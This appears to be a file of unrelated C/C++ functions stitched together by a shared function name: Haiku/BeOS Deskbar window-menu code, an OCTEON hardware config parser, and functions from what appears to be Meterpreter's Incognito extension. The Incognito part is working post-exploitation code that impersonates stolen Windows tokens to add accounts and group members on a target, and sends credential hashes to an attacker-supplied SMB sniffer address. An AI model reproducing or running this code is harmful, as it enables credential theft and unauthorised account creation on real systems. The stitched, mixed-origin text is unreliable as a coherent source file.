team_id CCrossHairDragView::FindTeam(const BPoint &screenPoint)
{
int32 currentWorkspace = current_workspace();
int32 tokenCount;
// Get a list of window tokens in the order of the
// z-order of the windows.
int32 *tokens = get_token_list(-1, &tokenCount);
if(tokens) {
for(int32 i=0 ; i<tokenCount; i++) {
window_info *windowInfo = get_window_info(tokens[i]);
if(!windowInfo) {
// That window probably closed. Just go to the next one.
continue;
}
if(!windowInfo->is_mini) {
// Not a hidden/minimized window
if((windowInfo->workspaces & (1 << currentWorkspace)) != 0) {
// Window is on this workspace
if( screenPoint.x >= windowInfo->window_left &&
screenPoint.x <= windowInfo->window_right &&
screenPoint.y >= windowInfo->window_top &&
screenPoint.y <= windowInfo->window_bottom ) {
// I found a valid window.
team_id id = windowInfo->team;
free(windowInfo);
return id;
}
}
}
free(windowInfo);
}
free(tokens);
}
return -1;
}
static void WarpMouseToWindow(const char* windowName)
{
int32 count;
int32 *tokens = get_token_list(-1, &count);
team_id pe_team = be_app->Team();
bool found = false;
for (int32 i = count-1; i>=0 && !found; i--)
{
window_info* windowInfo = get_window_info(tokens[i]);
if (windowInfo && windowInfo->team == pe_team
&& !strcmp(windowInfo->name, windowName))
{
do_window_action(windowInfo->id, B_BRING_TO_FRONT, BRect(0,0,0,0),
false);
found = true;
}
free(windowInfo);
}
free(tokens);
}
int32
TExpandoMenuBar::monitor_team_windows(void *arg)
{
TExpandoMenuBar *teamMenu = (TExpandoMenuBar *)arg;
int32 totalItems = 0;
bool itemModified = false;
TWindowMenuItem *item = NULL;
TTeamMenuItem *teamItem = NULL;
int32 *tokens = NULL;
while (teamMenu->sDoMonitor) {
totalItems = teamMenu->CountItems();
// Set all WindowMenuItems to require an update.
item = NULL;
for (int32 i = 0; i < totalItems; i++) {
if (!teamMenu->SubmenuAt(i)){
item = static_cast<TWindowMenuItem *>(teamMenu->ItemAt(i));
item->SetRequireUpdate();
}
}
// Perform SetTo() on all the items that still exist as well as add new items.
itemModified = false;
teamItem = NULL;
for (int32 i = 0; i < totalItems; i++) {
if (teamMenu->SubmenuAt(i)){
teamItem = static_cast<TTeamMenuItem *>(teamMenu->ItemAt(i));
if (teamItem->IsExpanded()) {
int32 teamCount = teamItem->Teams()->CountItems();
for (int32 j = 0; j < teamCount; j++) {
// The following code is almost a copy/paste from
// WindowMenu.cpp
team_id theTeam = (team_id)teamItem->Teams()->ItemAt(j);
int32 count = 0;
tokens = get_token_list(theTeam, &count);
for (int32 k = 0; k < count; k++) {
window_info *wInfo = get_window_info(tokens[k]);
if (wInfo == NULL)
continue;
if (TWindowMenu::WindowShouldBeListed(wInfo->w_type)
&& (wInfo->show_hide_level <= 0 || wInfo->is_mini)) {
// Check if we have a matching window item...
item = teamItem->ExpandedWindowItem(wInfo->id);
if (item) {
// Lock the window, changing workspaces will fry this.
item->SetTo(wInfo->name, wInfo->id, wInfo->is_mini,
((1 << current_workspace()) & wInfo->workspaces) != 0);
if (strcmp(wInfo->name, item->Label()) != 0)
item->SetLabel(wInfo->name);
if (item->ChangedState())
itemModified = true;
} else if (teamItem->IsExpanded()) {
// Add the item
item = new TWindowMenuItem(wInfo->name, wInfo->id,
wInfo->is_mini,
((1 << current_workspace()) & wInfo->workspaces) != 0,
false);
item->ExpandedItem(true);
teamMenu->AddItem(item, i + 1);
itemModified = true;
teamMenu->Window()->Lock();
teamMenu->SizeWindow();
teamMenu->Window()->Unlock();
}
}
free(wInfo);
}
free(tokens);
}
}
}
}
// Remove any remaining items which require an update.
for (int32 i = 0; i < totalItems; i++) {
if (!teamMenu->SubmenuAt(i)){
item = static_cast<TWindowMenuItem *>(teamMenu->ItemAt(i));
if (item && item->RequiresUpdate()) {
item = static_cast<TWindowMenuItem *>(teamMenu->RemoveItem(i));
delete item;
totalItems--;
teamMenu->Window()->Lock();
teamMenu->SizeWindow();
teamMenu->Window()->Unlock();
}
}
}
// If any of the WindowMenuItems changed state, we need to force a repaint.
if (itemModified) {
teamMenu->Window()->Lock();
teamMenu->Invalidate();
teamMenu->Window()->Unlock();
}
// sleep for a bit...
snooze(150000);
}
return B_OK;
}
void
TWindowMenu::AttachedToWindow()
{
SetFont(be_plain_font);
RemoveItems(0, CountItems(), true);
int32 miniCount = 0;
bool dragging = false;
TBarView* barview =(static_cast<TBarApp*>(be_app))->BarView();
if (barview && barview->LockLooper()) {
// 'dragging' mode set in BarView::CacheDragData
// invoke in MouseEnter in ExpandoMenuBar
dragging = barview->Dragging();
if (dragging) {
// We don't want to show the menu when dragging, but it's not
// possible to remove a submenu once it exists, so we simply hide it
// Don't call BMenu::Hide(), it causes the menu to pop up every now
// and then.
Window()->Hide();
// if in expando (horizontal or vertical)
if (barview->Expando()) {
SetTrackingHook(barview->MenuTrackingHook,
barview->GetTrackingHookData());
}
barview->DragStart();
}
barview->UnlockLooper();
}
int32 parentMenuItems = 0;
int32 numTeams = fTeam->CountItems();
for (int32 i = 0; i < numTeams; i++) {
team_id theTeam = (team_id)fTeam->ItemAt(i);
int32 count = 0;
int32* tokens = get_token_list(theTeam, &count);
for (int32 j = 0; j < count; j++) {
client_window_info* wInfo = get_window_info(tokens[j]);
if (wInfo == NULL)
continue;
if (WindowShouldBeListed(wInfo->feel)
&& (wInfo->show_hide_level <= 0 || wInfo->is_mini)) {
// Don't add new items if we're expanded. We've already done
// this, they've just been moved.
int32 numItems = CountItems();
int32 addIndex = 0;
for (; addIndex < numItems; addIndex++)
if (strcasecmp(ItemAt(addIndex)->Label(), wInfo->name) > 0)
break;
if (!fExpanded) {
TWindowMenuItem* item = new TWindowMenuItem(wInfo->name,
wInfo->server_token, wInfo->is_mini,
((1 << current_workspace()) & wInfo->workspaces) != 0,
dragging);
// disable app's window dropping for now
if (dragging)
item->SetEnabled(false);
AddItem(item,
TWindowMenuItem::InsertIndexFor(this, 0, item));
} else {
TTeamMenuItem* parentItem
= static_cast<TTeamMenuItem*>(Superitem());
if (parentItem->ExpandedWindowItem(wInfo->server_token)) {
TWindowMenuItem* item = parentItem->ExpandedWindowItem(
wInfo->server_token);
if (item == NULL)
continue;
item->SetTo(wInfo->name, wInfo->server_token,
wInfo->is_mini,
((1 << current_workspace()) & wInfo->workspaces)
!= 0, dragging);
parentMenuItems++;
}
}
if (wInfo->is_mini)
miniCount++;
}
free(wInfo);
}
free(tokens);
}
int32 itemCount = CountItems() + parentMenuItems;
if (itemCount < 1) {
TWindowMenuItem* noWindowsItem =
new TWindowMenuItem("No windows", -1, false, false);
noWindowsItem->SetEnabled(false);
AddItem(noWindowsItem);
// if an application has no windows, this feature makes it easy to quit
// it. (but we only add this option if the application is not Tracker.)
if (fApplicationSignature.ICompare(kTrackerSignature) != 0) {
AddSeparatorItem();
AddItem(new TShowHideMenuItem("Quit application", fTeam,
B_QUIT_REQUESTED));
}
} else {
// if we are in drag mode, then don't add the window controls
// to the menu
if (!dragging) {
TShowHideMenuItem* hide =
new TShowHideMenuItem("Hide all", fTeam, B_MINIMIZE_WINDOW);
TShowHideMenuItem* show =
new TShowHideMenuItem("Show all", fTeam, B_BRING_TO_FRONT);
TShowHideMenuItem* close =
new TShowHideMenuItem("Close all", fTeam, B_QUIT_REQUESTED);
if (miniCount == itemCount)
hide->SetEnabled(false);
else if (miniCount == 0)
show->SetEnabled(false);
if (!parentMenuItems)
AddSeparatorItem();
AddItem(hide);
AddItem(show);
AddItem(close);
}
}
BMenu::AttachedToWindow();
}
DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet)
{
DWORD dwLevel = 1, dwError = 0, num_tokens = 0, i;
NET_API_STATUS nStatus;
LOCALGROUP_MEMBERS_INFO_3 localgroup_member;
SavedToken *token_list = NULL;
HANDLE saved_token;
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE];
char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
// Read arguments
Packet *response = packet_create_response(packet);
dc_netbios_name = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
groupname = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_GROUPNAME);
username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_USERNAME);
mbstowcs(dc_netbios_name_u, dc_netbios_name, strlen(dc_netbios_name)+1);
mbstowcs(username_u, username, strlen(username)+1);
mbstowcs(groupname_u, groupname, strlen(groupname)+1);
localgroup_member.lgrmi3_domainandname = username_u;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
goto cleanup;
}
sprintf(return_value, "[*] Attempting to add user %s to localgroup %s on host %s\n", username, groupname, dc_netbios_name);
// Attempt to add user to localgroup with every token
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
// causes major problems (always error 127) once you have impersonated this token once. No idea why!!!
if (!_stricmp("NT AUTHORITY\\ANONYMOUS LOGON", token_list[i].username))
continue;
ImpersonateLoggedOnUser(token_list[i].token);
nStatus = NetLocalGroupAddMembers(dc_netbios_name_u, groupname_u, 3, (LPBYTE)&localgroup_member, 1);
RevertToSelf();
switch (nStatus)
{
case ERROR_ACCESS_DENIED:
case ERROR_LOGON_FAILURE: // unknown username or bad password
case ERROR_INVALID_PASSWORD:
break;
case NERR_Success:
strncat(return_value, "[+] Successfully added user to local group\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_InvalidComputer:
strncat(return_value, "[-] Computer name invalid\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case ERROR_NO_SUCH_MEMBER:
strncat(return_value, "[-] User not found\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_GroupNotFound:
case 1376: // found by testing (also group not found)
strncat(return_value, "[-] Local group not found\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case ERROR_MEMBER_IN_ALIAS:
strncat(return_value, "[-] User already in group\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
default:
sprintf(temp, "Unknown error: %d \n", nStatus);
strncat(return_value, temp, sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
}
}
strncat(return_value, "[-] Access denied with all tokens\n", sizeof(return_value)-strlen(return_value)-1);
cleanup:
for (i=0;i<num_tokens;i++)
CloseHandle(token_list[i].token);
free(token_list);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
packet_transmit_response(ERROR_SUCCESS, remote, response);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
ImpersonateLoggedOnUser(saved_token);
return ERROR_SUCCESS;
}
DWORD request_incognito_add_user(Remote *remote, Packet *packet)
{
USER_INFO_1 ui;
DWORD dwLevel = 1, dwError = 0, num_tokens = 0, i;
NET_API_STATUS nStatus;
SavedToken *token_list = NULL;
HANDLE saved_token;
char *dc_netbios_name, *username, *password, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], password_u[BUF_SIZE];
// Read arguments
Packet *response = packet_create_response(packet);
dc_netbios_name = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_USERNAME);
password = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_PASSWORD);
mbstowcs(dc_netbios_name_u, dc_netbios_name, strlen(dc_netbios_name)+1);
mbstowcs(username_u, username, strlen(username)+1);
mbstowcs(password_u, password, strlen(password)+1);
ui.usri1_name = username_u;
ui.usri1_password = password_u;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
goto cleanup;
}
sprintf(return_value, "[*] Attempting to add user %s to host %s\n", username, dc_netbios_name);
// Attempt to add user with every token
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
// causes major problems (always error 127) once you have impersonated this token once. No idea why!!!
if (!_stricmp("NT AUTHORITY\\ANONYMOUS LOGON", token_list[i].username))
continue;
ImpersonateLoggedOnUser(token_list[i].token);
nStatus = NetUserAdd(dc_netbios_name_u, 1, (LPBYTE)&ui, &dwError);
RevertToSelf();
switch (nStatus)
{
case ERROR_ACCESS_DENIED:
case ERROR_LOGON_FAILURE: // unknown username or bad password
case ERROR_INVALID_PASSWORD:
break;
case NERR_Success:
strncat(return_value, "[+] Successfully added user\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_InvalidComputer:
strncat(return_value, "[-] Computer name invalid\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_NotPrimary:
strncat(return_value, "[-] Operation only allowed on primary domain controller\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_GroupExists:
strncat(return_value, "[-] Group already exists\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_UserExists:
strncat(return_value, "[-] User already exists\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_PasswordTooShort:
strncat(return_value,"[-] Password does not meet complexity requirements\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
default:
sprintf(temp, "[-] Unknown error: %d\n", nStatus);
strncat(return_value, temp, sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
}
}
strncat(return_value, "[-] Access denied with all tokens\n", sizeof(return_value)-strlen(return_value)-1);
cleanup:
for (i=0;i<num_tokens;i++)
CloseHandle(token_list[i].token);
free(token_list);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
packet_transmit_response(ERROR_SUCCESS, remote, response);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
ImpersonateLoggedOnUser(saved_token);
return ERROR_SUCCESS;
}
// Send off hashes for all tokens to IP address with SMB sniffer running
DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
{
DWORD num_tokens = 0, i;
SavedToken *token_list = NULL;
NETRESOURCEW nr;
HANDLE saved_token;
TOKEN_PRIVS token_privs;
wchar_t conn_string[BUF_SIZE] = L"", domain_name[BUF_SIZE] = L"",
return_value[BUF_SIZE] = L"", temp[BUF_SIZE] = L"";
Packet *response = packet_create_response(packet);
char *smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
// Initialise net_resource structure (essentially just set ip to that of smb_sniffer)
if (_snwprintf(conn_string, BUF_SIZE, L"\\\\%s", smb_sniffer_ip) == -1)
{
conn_string[BUF_SIZE - 1] = '\0';
}
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = conn_string;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
packet_transmit_response(GetLastError(), remote, response);
goto cleanup;
}
// Use every token and get hashes by connecting to SMB sniffer
for (i = 0; i < num_tokens; i++)
{
if (token_list[i].token)
{
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
// XXX This may need some expansion to support other languages
if (_wcsicmp(domain_name, L"NT AUTHORITY"))
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2W(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2W(&nr, NULL, NULL, 0))
{
// Revert to primary token
RevertToSelf();
}
}
CloseHandle(token_list[i].token);
}
}
packet_transmit_response(ERROR_SUCCESS, remote, response);
cleanup:
free(token_list);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
{
ImpersonateLoggedOnUser(saved_token);
}
return ERROR_SUCCESS;
}
int cvmx_parse_config()
{
token_list_t *list;
int start_index=0;
int rv;
cvmx_ipd_config_t ipd_config;
cvmx_dma_config_t dma_config;
cvmx_tim_config_t timer_config;
cvmx_dfa_app_config_t dfa_config;
cvmx_zip_config_t zip_config;
cvmx_raid_config_t raid_config;
cvmx_bch_app_config_t bch_config;
if (cvmx_app_config_str == 0)
cvmx_dprintf("ERROR: application config string is not set\n");
if(dbg_parse)
cvmx_dprintf("Parsing config string.\n");
list = init_token_list(30, 128);
cvmx_ipd_get_config(&ipd_config);
cvmx_dma_get_cmd_que_pool_config(&dma_config.command_queue_pool);
cvmx_pko_get_cmd_que_pool_config(&pko_fpa_cfg);
cvmx_tim_get_fpa_pool_config(&timer_config.timer_pool);
cvmx_dfa_get_fpa_pool_config(&dfa_config.dfa_pool);
cvmx_zip_get_fpa_pool_config(&zip_config.zip_pool);
cvmx_raid_get_cmd_que_pool_config(&raid_config.command_queue_pool);
cvmx_bch_get_cmd_que_pool_config(&bch_config.command_queue_pool);
while (1) {
/* Parsing the config string line by line, each call to get_token_list()
returns the tokens on the next line */
start_index = get_token_list(list, cvmx_app_config_str, start_index);
//show_token_list(list);
if (list->token_index >= 1) {
if (SC(TK[0],"pko") == 0) {
rv = parse_pko_config_command(list);
if (rv != 0) {
cvmx_dprintf("ERROR: in parsing pko commands\n");
show_token_list(list);
}
}
else if (SC(TK[0],"ipd") == 0) {
if((rv = parse_ipd_config_command(list, &ipd_config))) {
cvmx_dprintf("ERROR: in parsing IPD command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"rgmii") == 0) {
if((rv = parse_rgmii_config_command(list))) {
cvmx_dprintf("ERROR: in parsing rgmii command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"dma") == 0) {
if((rv = parse_dma_config_command(list, &dma_config ))) {
cvmx_dprintf("ERROR: in parsing dma command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"timer") == 0) {
if((rv = parse_timer_config_command(list, &timer_config ))) {
cvmx_dprintf("ERROR: in parsing timer command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"dfa") == 0) {
if((rv = parse_dfa_config_command(list, &dfa_config ))) {
cvmx_dprintf("ERROR: in parsing dfa command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"zip") == 0) {
if((rv = parse_zip_config_command(list, &zip_config ))) {
cvmx_dprintf("ERROR: in parsing zip command\n");
show_token_list(list);
}
}
else if (SC(TK[0], "bch") == 0) {
if ((rv = parse_bch_config_command(list, &bch_config))) {
cvmx_dprintf("ERROR: in parsing bch command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"raid") == 0) {
if((rv = parse_raid_config_command(list, &raid_config ))) {
cvmx_dprintf("ERROR: in parsing raid command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"llm") == 0) {
if((rv = parse_llm_config_command(list))) {
cvmx_dprintf("ERROR: in parsing llm command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"spi") == 0) {
if((rv = parse_spi_config_command(list))) {
cvmx_dprintf("ERROR: in parsing spi command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"ilk") == 0) {
if((rv = parse_ilk_config_command(list))) {
cvmx_dprintf("ERROR: in parsing ilk command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"npi") == 0) {
if((rv = parse_npi_config_command(list))) {
cvmx_dprintf("ERROR: in parsing npi command\n");
show_token_list(list);
}
}
else if (SC(TK[0],"pki") == 0) {
if(OCTEON_IS_MODEL(OCTEON_CN78XX)) {
if((rv = parse_pki_config_command(list))) {
cvmx_dprintf("ERROR: in parsing pki command\n");
show_token_list(list);
}
}
}
}
if (cvmx_app_config_str[start_index] == '\0') {
cvmx_ipd_set_config(ipd_config);
cvmx_pko_set_cmd_que_pool_config(pko_fpa_cfg.pool_num,
pko_fpa_cfg.buffer_size, pko_fpa_cfg.buffer_count);
cvmx_zip_set_fpa_pool_config(zip_config.zip_pool.pool_num,
zip_config.zip_pool.buffer_size, zip_config.zip_pool.buffer_count);
cvmx_tim_set_fpa_pool_config(timer_config.timer_pool.pool_num,
timer_config.timer_pool.buffer_size, timer_config.timer_pool.buffer_count);
cvmx_dfa_set_fpa_pool_config(dfa_config.dfa_pool.pool_num,
dfa_config.dfa_pool.buffer_size, dfa_config.dfa_pool.buffer_count);
cvmx_dma_set_cmd_que_pool_config(dma_config.command_queue_pool.pool_num,
dma_config.command_queue_pool.buffer_size, dma_config.command_queue_pool.buffer_count);
cvmx_raid_set_cmd_que_pool_config(raid_config.command_queue_pool.pool_num,
raid_config.command_queue_pool.buffer_size, raid_config.command_queue_pool.buffer_count);
cvmx_bch_set_cmd_que_pool_config(bch_config.command_queue_pool.pool_num,
bch_config.command_queue_pool.buffer_size,
bch_config.command_queue_pool.buffer_count);
break;
}
start_index++;
reset_token_index(list);
}
return 0;
}
DWORD request_incognito_list_tokens(Remote *remote, Packet *packet)
{
DWORD num_unique_tokens = 0, num_tokens = 0, i;
unique_user_token *uniq_tokens = calloc(BUF_SIZE, sizeof(unique_user_token));
SavedToken *token_list = NULL;
BOOL bTokensAvailable = FALSE;
TOKEN_ORDER token_order;
TOKEN_PRIVS token_privs;
char *delegation_tokens = calloc(sizeof(char), BUF_SIZE),
*impersonation_tokens = calloc(sizeof(char), BUF_SIZE),
temp[BUF_SIZE] = "";
Packet *response = packet_create_response(packet);
token_order = packet_get_tlv_value_uint(packet, TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER);
// Enumerate tokens
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
packet_transmit_response(GetLastError(), remote, response);
return ERROR_SUCCESS;
}
// Process all tokens to get determinue unique names and delegation abilities
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
process_user_token(token_list[i].token, uniq_tokens, &num_unique_tokens, token_order);
CloseHandle(token_list[i].token);
}
// Sort by name and then display all delegation and impersonation tokens
qsort(uniq_tokens, num_unique_tokens, sizeof(unique_user_token), compare_token_names);
for (i=0;i<num_unique_tokens;i++)
if (uniq_tokens[i].delegation_available)
{
bTokensAvailable = TRUE;
strncat(delegation_tokens, uniq_tokens[i].username, BUF_SIZE-strlen(delegation_tokens)-1);
strncat(delegation_tokens, "\n", BUF_SIZE-strlen(delegation_tokens)-1);
}
if (!bTokensAvailable)
strncat(delegation_tokens, "No tokens available\n", BUF_SIZE-strlen(delegation_tokens)-1);
bTokensAvailable = FALSE;
for (i=0;i<num_unique_tokens;i++)
if (!uniq_tokens[i].delegation_available && uniq_tokens[i].impersonation_available)
{
bTokensAvailable = TRUE;
strncat(impersonation_tokens, uniq_tokens[i].username, BUF_SIZE-strlen(impersonation_tokens)-1);
strncat(impersonation_tokens, "\n", BUF_SIZE-strlen(impersonation_tokens)-1);
}
if (!bTokensAvailable)
strncat(impersonation_tokens, "No tokens available\n", BUF_SIZE-strlen(impersonation_tokens)-1);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION, delegation_tokens);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION, impersonation_tokens);
packet_transmit_response(ERROR_SUCCESS, remote, response);
free(token_list);
free(uniq_tokens);
free(delegation_tokens);
free(impersonation_tokens);
return ERROR_SUCCESS;
}
DWORD request_incognito_impersonate_token(Remote *remote, Packet *packet)
{
DWORD num_unique_tokens = 0, num_tokens = 0, i;
unique_user_token *uniq_tokens = calloc(BUF_SIZE, sizeof(unique_user_token));
SavedToken *token_list = NULL;
BOOL bTokensAvailable = FALSE, delegation_available = FALSE;
char temp[BUF_SIZE] = "", *requested_username, return_value[BUF_SIZE] = "";
HANDLE xtoken;
TOKEN_PRIVS token_privs;
Packet *response = packet_create_response(packet);
requested_username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN);
// Enumerate tokens
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
sprintf(temp, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
goto cleanup;
}
// Process all tokens to get determinue unique names and delegation abilities
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
process_user_token(token_list[i].token, uniq_tokens, &num_unique_tokens, BY_USER);
process_user_token(token_list[i].token, uniq_tokens, &num_unique_tokens, BY_GROUP);
}
for (i=0;i<num_unique_tokens;i++)
{
if (!_stricmp(uniq_tokens[i].username, requested_username) )//&& uniq_tokens[i].impersonation_available)
{
if (uniq_tokens[i].delegation_available)
delegation_available = TRUE;
if (delegation_available)
strncat(return_value, "[+] Delegation token available\n", sizeof(return_value)-strlen(return_value)-1);
else
strncat(return_value, "[-] No delegation token available\n", sizeof(return_value)-strlen(return_value)-1);
for (i=0;i<num_tokens;i++)
{
if (is_token(token_list[i].token, requested_username))
if (ImpersonateLoggedOnUser(token_list[i].token))
{
strncat(return_value, "[+] Successfully impersonated user ", sizeof(return_value)-strlen(return_value)-1);
strncat(return_value, token_list[i].username, sizeof(return_value)-strlen(return_value)-1);
strncat(return_value, "\n", sizeof(return_value)-strlen(return_value)-1);
if (!DuplicateTokenEx(token_list[i].token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &xtoken)) {
dprintf("[INCOGNITO] Failed to duplicate token for %s (%u)", token_list[i].username, GetLastError());
} else {
core_update_thread_token(remote, xtoken);
}
goto cleanup;
}
}
}
}
strncat(return_value, "[-] User token ", sizeof(return_value)-strlen(return_value)-1);
strncat(return_value, requested_username, sizeof(return_value)-strlen(return_value)-1);
strncat(return_value, " not found\n", sizeof(return_value)-strlen(return_value)-1);
cleanup:
for (i=0;i<num_tokens;i++)
CloseHandle(token_list[i].token);
free(token_list);
free(uniq_tokens);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
packet_transmit_response(ERROR_SUCCESS, remote, response);
return ERROR_SUCCESS;
}
int32
TExpandoMenuBar::monitor_team_windows(void* arg)
{
TExpandoMenuBar* teamMenu = (TExpandoMenuBar*)arg;
while (teamMenu->sDoMonitor) {
sMonLocker.Lock();
if (teamMenu->Window()->LockWithTimeout(50000) == B_OK) {
int32 totalItems = teamMenu->CountItems();
// Set all WindowMenuItems to require an update.
TWindowMenuItem* item = NULL;
for (int32 i = 0; i < totalItems; i++) {
if (!teamMenu->SubmenuAt(i)) {
item = static_cast<TWindowMenuItem*>(teamMenu->ItemAt(i));
item->SetRequireUpdate(true);
}
}
// Perform SetTo() on all the items that still exist as well as add
// new items.
bool itemModified = false;
bool resize = false;
TTeamMenuItem* teamItem = NULL;
for (int32 i = 0; i < totalItems; i++) {
if (teamMenu->SubmenuAt(i) == NULL)
continue;
teamItem = static_cast<TTeamMenuItem*>(teamMenu->ItemAt(i));
if (teamItem->IsExpanded()) {
int32 teamCount = teamItem->Teams()->CountItems();
for (int32 j = 0; j < teamCount; j++) {
// The following code is almost a copy/paste from
// WindowMenu.cpp
team_id theTeam = (addr_t)teamItem->Teams()->ItemAt(j);
int32 count = 0;
int32* tokens = get_token_list(theTeam, &count);
for (int32 k = 0; k < count; k++) {
client_window_info* wInfo
= get_window_info(tokens[k]);
if (wInfo == NULL)
continue;
if (TWindowMenu::WindowShouldBeListed(wInfo)) {
// Check if we have a matching window item...
item = teamItem->ExpandedWindowItem(
wInfo->server_token);
if (item != NULL) {
item->SetTo(wInfo->name,
wInfo->server_token, wInfo->is_mini,
((1 << current_workspace())
& wInfo->workspaces) != 0);
if (strcasecmp(item->Label(), wInfo->name) > 0)
item->SetLabel(wInfo->name);
if (item->Modified())
itemModified = true;
} else if (teamItem->IsExpanded()) {
// Add the item
item = new TWindowMenuItem(wInfo->name,
wInfo->server_token, wInfo->is_mini,
((1 << current_workspace())
& wInfo->workspaces) != 0, false);
item->SetExpanded(true);
teamMenu->AddItem(item,
TWindowMenuItem::InsertIndexFor(
teamMenu, i + 1, item));
resize = true;
}
}
free(wInfo);
}
free(tokens);
}
}
}
// Remove any remaining items which require an update.
for (int32 i = 0; i < totalItems; i++) {
if (!teamMenu->SubmenuAt(i)) {
item = static_cast<TWindowMenuItem*>(teamMenu->ItemAt(i));
if (item && item->RequiresUpdate()) {
item = static_cast<TWindowMenuItem*>
(teamMenu->RemoveItem(i));
delete item;
totalItems--;
resize = true;
}
}
}
// If any of the WindowMenuItems changed state, we need to force a
// repaint.
if (itemModified || resize) {
teamMenu->Invalidate();
if (resize)
teamMenu->SizeWindow(1);
}
teamMenu->Window()->Unlock();
}
sMonLocker.Unlock();
// sleep for a bit...
snooze(150000);
}
return B_OK;
}